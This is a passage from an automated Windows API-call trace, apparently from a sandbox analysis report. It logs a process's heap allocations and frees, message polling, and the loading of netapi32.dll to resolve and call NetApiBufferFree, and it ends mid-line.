1 [0248.622] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8c70 | out: hHeap=0xbe0000) returned 1 [0248.622] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8b50 | out: hHeap=0xbe0000) returned 1 [0248.622] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8a90 | out: hHeap=0xbe0000) returned 1 [0248.622] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d878 | out: hHeap=0xbe0000) returned 1 [0248.622] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53250 | out: hHeap=0xbe0000) returned 1 [0248.622] PeekMessageW (in: lpMsg=0x8befb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befb4) returned 0 [0248.622] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d878 [0248.622] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8a90 [0248.622] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53250 [0248.622] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8b50 [0248.622] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8c70 [0248.622] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53210 [0248.622] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8c70 | out: hHeap=0xbe0000) returned 1 [0248.622] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d8c8 [0248.622] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8c70 [0248.623] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53260 [0248.623] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x14) returned 0xe40b10 [0248.623] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x24) returned 0xe08b38 [0248.623] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf66d8 [0248.623] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53240 [0248.623] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53260 | out: hHeap=0xbe0000) returned 1 [0248.623] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6678 [0248.623] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53260 [0248.623] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53260 | out: hHeap=0xbe0000) returned 1 [0248.623] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x52) returned 0xdba930 [0248.623] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8838 [0248.623] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d8a0 [0248.623] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53260 [0248.623] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdba930 | out: hHeap=0xbe0000) returned 1 [0248.623] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf66d8 | out: hHeap=0xbe0000) returned 1 [0248.623] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53240 | out: hHeap=0xbe0000) returned 1 [0248.623] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe08b38 | out: hHeap=0xbe0000) returned 1 [0248.623] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe40b10 | out: hHeap=0xbe0000) returned 1 [0248.623] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8c70 | out: hHeap=0xbe0000) returned 1 [0248.623] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6678 | out: hHeap=0xbe0000) returned 1 [0248.623] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d8c8 | out: hHeap=0xbe0000) returned 1 [0248.623] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53210 | out: hHeap=0xbe0000) returned 1 [0248.624] PeekMessageW (in: lpMsg=0x8befb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befb4) returned 0 [0248.624] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d8c8 [0248.624] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6678 [0248.624] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53210 [0248.624] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8c70 [0248.624] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53210 | out: hHeap=0xbe0000) returned 1 [0248.624] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf66d8 [0248.624] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53210 [0248.624] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8808 [0248.624] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53210 | out: hHeap=0xbe0000) returned 1 [0248.624] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf87f0 [0248.624] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53210 [0248.624] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf62e8 [0248.624] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53210 | out: hHeap=0xbe0000) returned 1 [0248.624] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6588 [0248.624] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53210 [0248.624] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8ac0 [0248.624] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53210 | out: hHeap=0xbe0000) returned 1 [0248.624] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8af0 [0248.624] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53210 [0248.624] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53210 | out: hHeap=0xbe0000) returned 1 [0248.624] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53210 [0248.625] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6528 [0248.625] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0248.625] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8a30 [0248.625] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53240 [0248.625] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe531e0 [0248.625] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8b38 [0248.625] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8a30 | out: hHeap=0xbe0000) returned 1 [0248.625] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53240 | out: hHeap=0xbe0000) returned 1 [0248.625] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8b38 | out: hHeap=0xbe0000) returned 1 [0248.625] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531e0 | out: hHeap=0xbe0000) returned 1 [0248.625] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d918 [0248.625] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe531e0 [0248.625] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8b38 [0248.625] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53240 [0248.625] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53220 [0248.625] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8a30 [0248.625] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8b38 | out: hHeap=0xbe0000) returned 1 [0248.625] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53240 | out: hHeap=0xbe0000) returned 1 [0248.626] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8a30 | out: hHeap=0xbe0000) returned 1 [0248.626] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53220 | out: hHeap=0xbe0000) returned 1 [0248.626] LoadLibraryW (lpLibFileName="netapi32.dll") returned 0x74480000 [0248.636] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf65b8 [0248.636] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53220 [0248.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NetApiBufferFree", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0248.636] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x11) returned 0xe40b10 [0248.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NetApiBufferFree", cchWideChar=17, lpMultiByteStr=0xe40b10, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NetApiBufferFree", lpUsedDefaultChar=0x0) returned 17 [0248.636] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf65b8 | out: hHeap=0xbe0000) returned 1 [0248.636] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d8f0 [0248.636] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe40b10 | out: hHeap=0xbe0000) returned 1 [0248.637] GetProcAddress (hModule=0x74480000, lpProcName="NetApiBufferFree") returned 0x744b13d2 [0248.637] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d8f0 | out: hHeap=0xbe0000) returned 1 [0248.637] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53220 | out: hHeap=0xbe0000) returned 1 [0248.637] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d8f0 [0248.637] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53220 [0248.637] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53220 | out: hHeap=0xbe0000) returned 1 [0248.637] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d8f0 | out: hHeap=0xbe0000) returned 1 [0248.637] NetApiBufferFree (Buffer=0xe08b68) returned 0x0 [0248.637] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53220 [0248.637] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x214) returned 0xe67f28 [0248.637] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53240 [0248.637] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6468 [0248.637] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8970 [0248.637] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8988 [0248.637] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53200 [0248.637] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8988 | out: hHeap=0xbe0000) returned 1 [0248.637] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53200 | out: hHeap=0xbe0000) returned 1 [0248.638] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8970 | out: hHeap=0xbe0000) returned 1 [0248.638] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8970 [0248.638] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8988 [0248.638] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6438 [0248.638] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53200 [0248.638] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6438 | out: hHeap=0xbe0000) returned 1 [0248.638] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53200 | out: hHeap=0xbe0000) returned 1 [0248.638] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8988 | out: hHeap=0xbe0000) returned 1 [0248.638] FreeLibrary (hLibModule=0x74480000) returned 1 [0248.643] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531e0 | out: hHeap=0xbe0000) returned 1 [0248.643] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d918 | out: hHeap=0xbe0000) returned 1 [0248.643] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6528 | out: hHeap=0xbe0000) returned 1 [0248.643] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53210 | out: hHeap=0xbe0000) returned 1 [0248.643] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8c70 | out: hHeap=0xbe0000) returned 1 [0248.643] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6678 | out: hHeap=0xbe0000) returned 1 [0248.643] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8808 | out: hHeap=0xbe0000) returned 1 [0248.643] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf66d8 | out: hHeap=0xbe0000) returned 1 [0248.643] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf62e8 | out: hHeap=0xbe0000) returned 1 [0248.643] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf87f0 | out: hHeap=0xbe0000) returned 1 [0248.643] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8ac0 | out: hHeap=0xbe0000) returned 1 [0248.643] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6588 | out: hHeap=0xbe0000) returned 1 [0248.643] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8af0 | out: hHeap=0xbe0000) returned 1 [0248.643] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d8c8 | out: hHeap=0xbe0000) returned 1 [0248.643] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6468 | out: hHeap=0xbe0000) returned 1 [0248.643] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8970 | out: hHeap=0xbe0000) returned 1 [0248.643] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53240 | out: hHeap=0xbe0000) returned 1 [0248.643] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe67f28 | out: hHeap=0xbe0000) returned 1 [0248.643] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53220 | out: hHeap=0xbe0000) returned 1 [0248.643] PeekMessageW (in: lpMsg=0x8befb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befb4) returned 0 [0248.643] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d8c8 [0248.643] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8970 [0248.643] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53220 [0248.644] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6468 [0248.644] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8af0 [0248.644] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53240 [0248.644] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53240 | out: hHeap=0xbe0000) returned 1 [0248.644] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8af0 | out: hHeap=0xbe0000) returned 1 [0248.644] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53240 [0248.644] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x214) returned 0xe67f28 [0248.644] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53210 [0248.644] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe531e0 [0248.644] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d918 [0248.644] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8af0 [0248.644] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53200 [0248.644] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe531f0 [0248.644] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531f0 | out: hHeap=0xbe0000) returned 1 [0248.644] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53200 | out: hHeap=0xbe0000) returned 1 [0248.644] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8af0 | out: hHeap=0xbe0000) returned 1 [0248.644] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d918 | out: hHeap=0xbe0000) returned 1 [0248.644] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531e0 | out: hHeap=0xbe0000) returned 1 [0248.644] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8af0 [0248.644] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6588 [0248.645] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8ac0 [0248.645] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe531e0 [0248.645] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8ac0 | out: hHeap=0xbe0000) returned 1 [0248.645] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531e0 | out: hHeap=0xbe0000) returned 1 [0248.645] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6588 | out: hHeap=0xbe0000) returned 1 [0248.645] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe531e0 [0248.645] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6588 [0248.645] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531e0 | out: hHeap=0xbe0000) returned 1 [0248.645] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8ac0 [0248.645] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf87f0 [0248.645] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf62e8 [0248.645] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe531e0 [0248.645] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf62e8 | out: hHeap=0xbe0000) returned 1 [0248.645] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d918 [0248.645] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6588 | out: hHeap=0xbe0000) returned 1 [0248.645] PeekMessageW (in: lpMsg=0x8befb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befb4) returned 0 [0248.645] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53200 [0248.645] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe531f0 [0248.645] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53200 | out: hHeap=0xbe0000) returned 1 [0248.645] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53200 [0248.645] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531f0 | out: hHeap=0xbe0000) returned 1 [0248.646] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe531f0 [0248.646] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53200 | out: hHeap=0xbe0000) returned 1 [0248.646] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe016a0 | out: hHeap=0xbe0000) returned 1 [0248.646] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf88f8 | out: hHeap=0xbe0000) returned 1 [0248.646] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf88c8 | out: hHeap=0xbe0000) returned 1 [0248.646] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53280 | out: hHeap=0xbe0000) returned 1 [0248.646] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf88b0 | out: hHeap=0xbe0000) returned 1 [0248.646] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf63a8 | out: hHeap=0xbe0000) returned 1 [0248.646] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6378 | out: hHeap=0xbe0000) returned 1 [0248.646] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8880 | out: hHeap=0xbe0000) returned 1 [0248.646] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf88e0 | out: hHeap=0xbe0000) returned 1 [0248.646] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe61b90 | out: hHeap=0xbe0000) returned 1 [0248.646] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53230 | out: hHeap=0xbe0000) returned 1 [0248.646] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf89e8 | out: hHeap=0xbe0000) returned 1 [0248.646] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf89d0 | out: hHeap=0xbe0000) returned 1 [0248.646] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe532b0 | out: hHeap=0xbe0000) returned 1 [0248.646] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d490 | out: hHeap=0xbe0000) returned 1 [0248.646] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf89a0 | out: hHeap=0xbe0000) returned 1 [0248.646] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf89b8 | out: hHeap=0xbe0000) returned 1 [0248.646] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d760 | out: hHeap=0xbe0000) returned 1 [0248.646] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe532c0 | out: hHeap=0xbe0000) returned 1 [0248.647] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d5d0 | out: hHeap=0xbe0000) returned 1 [0248.647] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8c58 | out: hHeap=0xbe0000) returned 1 [0248.647] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d558 | out: hHeap=0xbe0000) returned 1 [0248.647] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe532a0 | out: hHeap=0xbe0000) returned 1 [0248.647] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d580 | out: hHeap=0xbe0000) returned 1 [0248.647] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8ad8 | out: hHeap=0xbe0000) returned 1 [0248.647] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53270 | out: hHeap=0xbe0000) returned 1 [0248.647] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe08988 | out: hHeap=0xbe0000) returned 1 [0248.647] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe40af0 | out: hHeap=0xbe0000) returned 1 [0248.647] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8c40 | out: hHeap=0xbe0000) returned 1 [0248.647] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6738 | out: hHeap=0xbe0000) returned 1 [0248.647] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53290 | out: hHeap=0xbe0000) returned 1 [0248.647] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d828 | out: hHeap=0xbe0000) returned 1 [0248.647] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d8a0 | out: hHeap=0xbe0000) returned 1 [0248.647] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53260 | out: hHeap=0xbe0000) returned 1 [0248.647] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8838 | out: hHeap=0xbe0000) returned 1 [0248.648] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8b50 | out: hHeap=0xbe0000) returned 1 [0248.648] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8a90 | out: hHeap=0xbe0000) returned 1 [0248.648] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53250 | out: hHeap=0xbe0000) returned 1 [0248.648] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d878 | out: hHeap=0xbe0000) returned 1 [0248.648] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53240 | out: hHeap=0xbe0000) returned 1 [0248.648] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6468 | out: hHeap=0xbe0000) returned 1 [0248.648] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8970 | out: hHeap=0xbe0000) returned 1 [0248.648] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53220 | out: hHeap=0xbe0000) returned 1 [0248.648] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d8c8 | out: hHeap=0xbe0000) returned 1 [0248.648] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8c88 | out: hHeap=0xbe0000) returned 1 [0248.648] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8a18 | out: hHeap=0xbe0000) returned 1 [0248.648] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe532e0 | out: hHeap=0xbe0000) returned 1 [0248.648] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d8c8 [0248.648] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8a18 [0248.648] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe532e0 [0248.648] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8a18 | out: hHeap=0xbe0000) returned 1 [0248.648] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xe72c60 [0248.648] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8a18 [0248.648] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53220 [0248.648] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, 